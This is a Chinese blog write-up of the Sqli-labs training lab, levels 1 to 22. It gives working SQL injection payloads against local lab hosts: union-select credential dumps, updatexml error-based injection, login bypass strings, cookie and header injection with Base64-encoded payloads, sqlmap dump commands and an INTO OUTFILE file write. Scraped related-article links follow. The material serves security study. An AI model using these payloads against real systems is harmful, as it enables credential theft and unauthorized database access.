Sqli-labs靶场1-22

Sql注入的本质是代码和数据的未分离,导致用户的输入可以对数据库产生恶意的输入或输出。

本篇博客旨在通过Sqli-labs的第1-22关,详细的描述Sql注入的相关场景及分类。

Less-1

GET型传参,字符型注入,单引号闭合

首先判断闭合,输入单引号时,出现报错信息,判断是单引号闭合

#出现报错信息

http://127.0.0.1/sqli-labs/Lesss-1/?id=1 '

#报错信息消失,由此判断是单引号闭合

http://127.0.0.1/sqli-labs/Lesss-1/?id=1 '#

#进行注入

http://127.0.0.1/sqli-labs/Lesss-1/?id=1 ' order by 3 # //回显正确

http://127.0.0.1/sqli-labs/Lesss-1/?id=1 ' order by 4 # //回显错误,报错信息为: Unknown column '4' in 'order clause'

判断有3列

#查看报错位

http://127.0.0.1/sqli-labs/Lesss-1/?id=-1 ' union select 1,2,3  # //查看到报错位为2,3;注意这里id=-1才可以显示想要的回显

#正式进行注入

http://127.0.0.1/sqli-labs/Lesss-1/?id=-1 ' union select 1,version(),database()  # //查看版本,数据库名称

http://127.0.0.1/sqli-labs/Lesss-1/?id=-1 ' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()  # //查看到数据表名为emails,referers,uagents,users

http://127.0.0.1/sqli-labs/Lesss-1/?id=-1 ' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'  # //查询到users数据表的数据列为:id,username,password

http://127.0.0.1/sqli-labs/Lesss-1/?id=-1’

 union select 1,2,group_concat(id,0x3a,username,0x3a,password) from security.users # //注入出数据库所有的内容

Less-2

GET型传参,数字型注入

#正常显现

127.0.0.1/sqli-labs/Lesss-2/?id=1

#and逻辑运算符判断,为假时出现异常

127.0.0.1/sqli-labs/Lesss-2/?id=1 and 1=2 //得出结论为数字型注入

#进行注入

http://127.0.0.1/sqli-labs/Lesss-2/?id=-1

 union select 1,2,group_concat(id,0x3a,username,0x3a,password) from security.users #     //注入出数据库所有内容

Less-3

GET型传参,字符型注入,闭合为(' ')

#正常回显

http://127.0.0.1/sqli-labs/Lesss-3/?id=1 ') #

#进行注入

http://127.0.0.1/sqli-labs/Lesss-3/?id=-1 ') union select 1,2,group_concat(id,0x3a,username,0x3a,password) from security.users #

Less-4

GET型传参,字符型注入,闭合为("")

#出现报错信息

http://192.168.28.128/sqli-labs/Lesss-4/?id=2")

#正常回显

http://192.168.28.128/sqli-labs/Lesss-4/?id=2") #

#进行注入

http://192.168.28.128/sqli-labs/Lesss-4/?id=-1") union select 1,2,group_concat(id,0x3a,username,0x3a,password) from security.users #

Less-5

GET型传参,布尔盲注,单引号闭合,考虑报错注入或者布尔盲注

方法1:报错注入

#注入出数据库版本

http://192.168.28.128/sqli-labs/Lesss-5/?id=1 ' and updatexml(1,concat(0x7e,version()),0) #

#注入出表名

http://192.168.28.128/sqli-labs/Lesss-5/?id=1 ' and updatexml(1,concat(0x7e, (select table_name from information_schema.tables where table_schema=database() limit 0,1)),0) #

#注入出列名:

http://192.168.28.128/sqli-labs/Lesss-5/?id=1 ' and updatexml(1,concat(0x7e, (select column_name from information_schema.columns where table_name='users' limit 0,1)),0) #

#注入出数据

http://192.168.28.128/sqli-labs/Lesss-5/?id=1 ' and updatexml(1,concat(0x7e, (select username from security.users limit 0,1)),0) #

方法2:Sqlmap 布尔型盲注

 #查看数据表

 sqlmap -u "http://192.168.28.128/sqli-labs/Lesss-5/?id=1" --current-db --batch --level 5 --threads 10

 #进行数据注入

 sqlmap -u "http://192.168.28.128/sqli-labs/Lesss-5/?id=1" -D "security" -T "users" -C "username,password" --dump  --batch --level 5 --threads 10

Less-6

GET型传参,布尔传参,双引号闭合,考虑报错注入或者布尔盲注,方法与Less-5同,区别在于将单引号替换为双引号

#注入出数据库版本

http://192.168.28.128/sqli-labs/Lesss-6/?id=1" and updatexml(1,concat(0x7e,version()),0) #

#注入出数据

http://192.168.28.128/sqli-labs/Lesss-6/?id=1" and updatexml(1,concat(0x7e, (select username from security.users limit 0,1)),0) #

Less-7

通过本关名称可以看出是写入,这里涉及到一个概念:

MYSQL新特性secure_file_priv 对读写文件的影响,此开关默认为NULL,即不允许导入导出,这个对我们写入shell有重要的影响

secure_file_priv 结果
null 不允许导入导出
可以读写,但不可以动态更改
指定文件夹 mysql的导入导出只能发生在指定文件夹 
http://192.168.28.128/sqli-labs/Less-7/?id=1 ')) union select 1,database(),user() into outfile "E:/phpstudy/PHPTutorial/WWW/sqli-labs/Less-7"#

方法2:时间盲注

使用Sqlmap或者自己编写Python脚本

sqlmap -u "192.168.28.128/sqli-labs/Less-7/?id=1"  --threads 10 --level 3 -D security -T users -C id,password,username --dump

Less-8

GET型传参,布尔盲注,单引号闭合,无过滤,Sqlmap可以直接出

 sqlmap -u "http://192.168.28.128/sqli-labs/Less-8/?id=1" -D security -T users -C id,password,username --dump --threads 10 --level 5 --batch --technique B --dbms mysql

Less-9

GET型传参,无论输入正确与否皆为You are in,单引号闭合,时间盲注,Sqlmap直接出

 sqlmap -u "http://192.168.28.128/sqli-labs/Less-9/?id=1" -D security -T users -C id,password,username --dump --threads 10 --level 5 --batch --technique T --dbms mysql

Less-10

GET型传参,无论输入正确与否皆为You are in ,双引号闭合,时间盲注,Sqlmap直接出

#延迟3秒刷新

http://127.0.0.1/sqli-labs/Less-10/?id=1" and sleep(3) --+

#Sqlmap注入

 sqlmap -u "http://192.168.28.128/sqli-labs/Less-10/?id=1" -D security --tables --threads 10 --level 5 --batch --technique T --dbms mysql

Less-11

POST型传参,单引号闭合,可使用报错注入,也可使用万能密码

#POST型传参,发现登录成功

uname=admin '+or+ '1 '= '1&passwd=123&submit=Submit

#POST型注入工作

uname=admin") and updatexml(1,concat(0x7e, (select table_name from information_schema.tables where table_schema=database() limit 0,1)),0) #&passwd=123&submit=Submit

Less-12

POST型传参,闭合为"),同Less-11

#POST型传参,发现登录成功

uname=admin" )+or+("1" )=("1&passwd=123&submit=Submit

#POST型注入工作

uname=admin") and updatexml(1,concat(0x7e, (select table_name from information_schema.tables where table_schema=database() limit 0,1)),0) #&passwd=123&submit=Submit

Less-13

POST型传参,闭合为(''),考虑盲注或者报错注入

#报错注入

uname=admin ' )and updatexml(1,concat(0x7e, (select table_name from information_schema.tables where table_schema=database() limit 0,1)),0) #&passwd=123&submit=Submit

#时间盲注

sqlmap -r 1.txt --current-db --technique T --batch --threads 10 --dbms mysql

Less-14

POST型传参,闭合为” “,考虑报错注入

#报错注入

uname=admin"and updatexml(1,concat(0x7e, (select table_name from information_schema.tables where table_schema=database() limit 0,1)),0) #&passwd=123&submit=Submit

Less-15

POST型传参,闭合为‘’,时间盲注或者布尔盲注,考虑用Sqlmap一把嗦

sqlmap -r 2.txt --technique T --dbms mysql --current-db --batch --threads 10 --level 5

Less-16

同Less-15,不过闭合是(“”),可以考虑自己构造python脚本,或者Sqlmap.

sqlmap -r 3.txt --technique T --dbms mysql --current-db --batch --threads 10 --level 5

Less-17

POST型传参,闭合为' ',注入点在password

uname=admin&passwd=admin' and updatexml(1,concat(0x7e, (select table_name from information_schema.tables where table_schema=database() limit 0,1)),0) --+&submit=Submit

Less-18

POST型传参,UA型Insert注入,闭合方式为' and updatexml() and '1'='1 ,注意考虑闭合

' and updatexml(1,concat(0x7e,(select @@basedir),0x7e),1) and '1'='1

Less-19

回显Refer,考虑Refer注入

http://127.0.0.1/sqli-labs/Less-19/' and updatexml(1,concat(0x7e,(select @@basedir),0x7e),0) and '1'='1

Less-20

Cookie注入,在存储处修改Cookie即可

' and updatexml(1,concat(0x7e,(select @@basedir),0x7e),0) and '1'='1

Less-21

Cookie注入,发现Cookie处使用Base64编码,则将Less-20处Payload 使用Base64编码即可

YWRtaW4nIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IEBAYmFzZWRpciksMHg3ZSksMCkgYW5kICcxJz0nMQ==

Less-22

同Cookie注入,并且使用了Base64编码,不同处是使用了双引号进行闭合

编码前Payload

" and updatexml(1,concat(0x7e,(select @@basedir),0x7e),0) and "1"="1

编码后Payload

IiBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQGJhc2VkaXIpLDB4N2UpLDApIGFuZCAiMSI9IjE=

Sqli-labs 注入靶场(1-22)的更多相关文章

  1. Sqli labs系列-less-2 详细篇

    就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...

  2. Sqli labs系列-less-1 详细篇

    要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...

  3. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

  4. Sqli labs系列-less-3 。。。

    原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...

  5. PHPTaint-检测xss/sqli/shell注入的php扩展模块[转]

    web渗透者习惯采用黑盒或灰盒的方面来检测一款web应用是否存在漏洞,这种检测方法可以屏蔽不少漏洞,特别是程序逻辑中的漏洞.但如果能配合白盒的源码审计(也可以叫漏洞挖掘),效果将会更好,当然人力成本也 ...

  6. SQL注入系列:SQLi Labs

    前言 关于注释 说明:在SQL中--[空格]表示注释,但是在URL中--空格在发送请求的时候会把最后的空格去掉,所以用--+代替,因为+在被URL编码后会变成空格 MYSQL有三种常用注释: --[空 ...

  7. 搭建 sqli SQL注入练习靶场

    文章更新于:2020-02-18 按照惯例,需要的文件附上链接放在文首 文件名:sqli-labs-master.zip 文件大小:3.5 M 下载链接:https://www.lanzous.com ...

  8. Sqli - Labs 靶场笔记(一)

    Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...

  9. Sqli labs系列-less-5&6 报错注入法(下)

    我先输入 ' 让其出错. 然后知道语句是单引号闭合. 然后直接 and 1=1 测试. 返回正常,再 and 1=2 . 返回错误,开始猜表段数. 恩,3位.让其报错,然后注入... 擦,不错出,再加 ...

  10. Sqli labs系列-less-5&6 报错注入法(上)

    在我一系列常规的测试后发现,第五关和第六关,是属于报错注入的关卡,两关的区别是一个是单引号一个是双引号...当然我是看了源码的.... 基于报错注入的方法,我早就忘的差不多了,,,我记的我最后一次基于 ...

随机推荐

  1. LevelDB学习笔记 (2): 整体概览与读写实现细节

    1. leveldb整体介绍 首先leveldb的数据是存储在磁盘上的.采用LSM-Tree实现,LSM-Tree把对于磁盘的随机写操作转换成了顺序写操作.这是得益于此leveldb的写操作非常快,为 ...

  2. 955.WLB 不加班公司名单!再新增 5 家公司!

    大家好!我是<Visual Studio Code 权威指南>的作者韩骏.相信不少童鞋都是因为 VS Code 认识到我:也许是用了我写的 20 多个 VS Code 插件(比如 Code ...

  3. 富文本编辑器之游戏角色升级ing

    一.前言 想必大家看到这个标题,心中不禁会浮现几个问题: 什么是富文本编辑器? 富文本编辑器和游戏角色有什么关系? 为什么是升级ing? 什么是富文本编辑器--富文本编辑器集成了格式设置.媒体嵌入.社 ...

  4. Blazor Server 和 WebAssembly 应用程序入门指南

    翻译自 Waqas Anwar 2021年3月12日的文章 <A Beginner's Guide To Blazor Server and WebAssembly Applications&g ...

  5. 如何管理MongoDB的用户和权限

    管理用户的创建及使用 创建用户的函数是db.createUser({...}),创建用户时通常需要为该用户添加权限,如read.readWrite权限. 可添加的权限以及说明: 权限 作用 read ...

  6. Zoho Books十年发展历程

    十年前,我们推出Zoho Books的时候,是为了全面解决企业面临的财务和会计方面的挑战.我们逐渐地从一开始的易用的中小企业在线会计工具,发展成为现在的解决企业复杂的财务挑战的解决方案,其中经历了很多 ...

  7. Binding(五):多路绑定

    Binding不止能绑定一个源,它还能绑定多个源,这就是我们这节要讲的多路绑定:MultiBinding. 使用多路绑定跟一般的绑定还是有区别的,首先它并不能很好的在标记扩展中使用,另外,使用多路绑定 ...

  8. ctf Decode

    这题其实没啥好说的,就是直接解,听学长说好像网上有现成的轮子可以用,我太年轻了,手动写了个decode函数. 也成功得到了flag.嘿嘿开心

  9. WPF特效:流光动画效果

    今天有人问我想实现一个流光效果.我简单的录了一下他想实现效果的GIF. 实际效果如下:因为今天有事情,只是大概实现了一个效果.主要使用PointAnimationUsingKeyFrames动画效果来 ...

  10. 在 Intenseye,为什么我们选择 Linkerd2 作为 Service Mesh 工具(Part.2)

    在我们 service mesh 之旅的第一部分中,我们讨论了"什么是服务网格以及我们为什么选择 Linkerd2?".在第二部分,我们将讨论我们面临的问题以及我们如何解决这些问题 ...